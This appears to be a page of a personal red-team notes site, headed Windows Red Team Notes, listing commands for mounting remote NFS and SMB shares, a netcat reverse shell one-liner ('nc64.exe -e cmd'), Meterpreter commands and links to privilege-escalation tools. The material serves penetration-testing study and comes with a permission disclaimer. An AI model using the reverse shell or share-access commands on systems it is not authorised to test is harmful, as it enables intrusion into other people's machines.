Hackers Rest
  • Hacker's Rest
  • Tools & Cheatsheets
    • Cybersecurity YouTube Channels
  • Hacking Methodology
  • Hands-on Practice
  • Linux
    • Linux Basics
    • Hardening & Setup
      • TMUX/Screen Cheatsheet
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Data Exfiltration
      • Persistence
    • Vim
  • Windows
    • Windows Basics
    • PowerShell
    • Hardening & Setup
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Persistence
      • Data Exfiltration
      • Active Directory
        • Enumeration
        • Getting Access
        • Privilege Escalation
        • Persistence
      • Kerberos
      • Impacket
  • MacOS
    • MacOS Basics
    • Hardening & Configuration
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Persistence
  • Web
    • Burp Suite
    • DNS
    • Web Notes
      • Enumeration
      • Web Filter Bypass
      • Command Injection
      • Subdomain/Virtual Host Enumeration
      • The Web Application Hacker's Handbook
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Basic Enumeration
    • Cryptography & Encryption
    • Network Hardware
    • OS Agnostic
    • OSINT
    • Password Cracking
      • Gathering the Hashes
      • Wordlist Manipulation
      • Cracking the Hashes
    • Pivoting
      • Chisel
      • Plink.exe
      • SSH
      • Sshuttle
      • Socat
    • Reverse Engineering & Binary Exploitation
      • Buffer Overflow
    • Scripting
      • Script Language Syntax
    • SQL
    • SSH & SCP
    • Steganography
    • Wireless
  • Unsorted
Powered by GitBook
On this page
  • Enumeration
  • Shares
  • Mounting NFS Shares Remotely
  • Using smbmount
  • Unsorted

Was this helpful?

Edit on Git
  1. Windows

Red Team Notes

Sorted Linux notes, need to separate to different pages and reorganize

PreviousHardening & SetupNextEnumeration

Last updated 4 years ago

Was this helpful?

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

living off the land binaries:

Enumeration

Windows Privilege Escalation Enumeration Script:

Little bit o' everything:

Shares

Mounting NFS Shares Remotely

showmount -e <ip>
<list of mounts>
mkdir /tmp/<foldername?
mount -t nfs <ip>:/<mount-folder> /tmp/<foldername>

Using smbmount

smbmount //$IP/$share /mnt/remote/ -o username=$user,password=$pass,rw

Where /mnt/remote is the local folder to mount the share to.

Unsorted

Netcat reverse shell (after uploading the binary!): nc64.exe -e cmd <ip port>

system information: sysinfo

Get user id: getuid

Powershell privilege escalation:

  • Sherlock.ps1

check what updates are installed: type WindowsUpdate.log

net use share from linux [like SimpleHTTPServer for Samba]: impacket-smbserver <sharename> '<dir_to_share>'

5KFB6 tools:

easy windows shell: unicorn.py

from PowerShellEmpire

: exploit tool similar to metasploit

If you like this content and would like to see more, please consider !

https://specterops.io/resources/research-and-development
trustedsec/unicorn
HackTheBox - Arctic
PowerUp.ps1
fuzzbunch
buying me a coffee
LOLBAS
WinPEAS
PowerSploit
LogoExploiting NFS share [updated 2021] - Infosec ResourcesInfosec Resources